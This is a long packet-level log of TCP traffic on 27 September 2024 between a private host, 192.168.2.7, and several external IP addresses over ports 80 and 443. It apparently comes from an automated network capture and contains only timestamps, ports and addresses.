Sep 27, 2024 01:38:18.884257078 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884304047 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.884783030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884797096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884808064 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884819031 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884844065 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.884871006 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.885119915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885132074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885143042 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885190010 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.885195017 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885207891 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885224104 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885234118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885247946 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885258913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885268927 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885277987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.885279894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.885277987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.885303020 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.885327101 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.886074066 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.888286114 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.986221075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.986243010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.986253977 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.986267090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.986278057 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.986291885 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.986349106 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.986349106 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.994563103 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:18.994667053 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:18.994730949 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:19.108160973 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:19.108263016 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:19.112981081 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113023996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113080978 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113131046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113151073 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113167048 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113219023 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113236904 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113251925 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113300085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113332033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113348961 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113363981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113399029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113409042 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113434076 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113470078 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113481045 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113538980 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113586903 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113588095 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113622904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113655090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113672018 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113692999 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113723993 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113740921 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113756895 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113805056 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.113825083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113852978 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.113898993 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.114293098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114341021 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114372969 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114387035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.114406109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114439011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114464045 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.114471912 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114505053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114518881 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.114537001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114567995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114584923 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.114608049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.114661932 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.204974890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205012083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205065966 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205113888 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205146074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205152035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.205178022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205185890 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.205214024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205235958 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.205245972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205279112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205305099 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.205312014 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205346107 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205365896 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.205378056 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205415010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205490112 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.205498934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205554008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205558062 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.205591917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.205662012 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295010090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295047998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295100927 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295134068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295139074 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295166016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295191050 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295200109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295248032 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295270920 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295304060 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295350075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295404911 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295412064 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295439005 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295489073 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295490980 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295521975 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295542002 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295555115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295587063 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295608044 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295619011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295665979 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295702934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295715094 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.295738935 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.295789003 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.481601954 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:19.481637955 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:19.484683037 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:19.484716892 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:19.485079050 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:19.492635965 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:19.492794037 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:19.492824078 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:19.520994902 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:19.521090031 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:19.521338940 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:19.525178909 CEST	49745	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:19.525219917 CEST	443	49745	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:19.603022099 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603092909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603127956 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603137970 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603163004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603215933 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603255033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603257895 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603290081 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603322029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603333950 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603374004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603423119 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603456974 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603502035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603523970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603559017 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603595018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603634119 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603643894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603684902 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603692055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603728056 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603760958 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603791952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603797913 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603832006 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603852987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603862047 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603893995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603907108 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603926897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603934050 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.603961945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.603993893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604024887 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604044914 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604058027 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604063034 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604091883 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604137897 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604141951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604191065 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604235888 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604240894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604273081 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604307890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604338884 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604353905 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604374886 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604374886 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604408979 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604440928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604455948 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604474068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604506016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604520082 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604540110 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604572058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604598999 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604621887 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604630947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604645967 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604665041 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604696989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604715109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604729891 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604763985 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604779959 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604799032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604831934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604865074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604870081 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604897976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604914904 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.604931116 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.604963064 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.605005026 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.605016947 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.605037928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.605071068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.605082035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.605104923 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.605114937 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.605155945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.605205059 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.605521917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.605568886 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.610295057 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.610328913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.610362053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.610378027 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.610393047 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.610438108 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.661847115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.661869049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.661884069 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.661916018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.661936998 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662020922 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662024975 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662046909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662060976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662075043 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662089109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662101030 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662101984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662117958 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662131071 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662151098 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662234068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662255049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662269115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662281990 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662296057 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662297010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662322998 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662349939 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662501097 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662516117 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662528992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662547112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662556887 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662561893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662576914 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662591934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:19.662600994 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.662622929 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:19.704802990 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.018949986 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:20.019052029 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:20.019100904 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:20.019345999 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:20.019368887 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:20.019382000 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:20.019392014 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:20.034996986 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.035032034 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.035082102 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.035525084 CEST	49746	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:20.035536051 CEST	443	49746	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:20.054847002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.054917097 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.054930925 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.054945946 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.054959059 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.054965973 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.054975033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.054986000 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.055021048 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.055042028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.055043936 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.055058002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.055072069 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.055077076 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.055110931 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145291090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145342112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145363092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145376921 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145396948 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145410061 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145421028 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145423889 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145440102 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145442963 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145473957 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145478010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145505905 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145531893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145572901 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145586014 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145601034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145613909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145637035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145652056 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145852089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145865917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145879030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145909071 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:20.145915031 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:20.145922899 CEST	80	49743	147.45.44.104	192.168.2.7
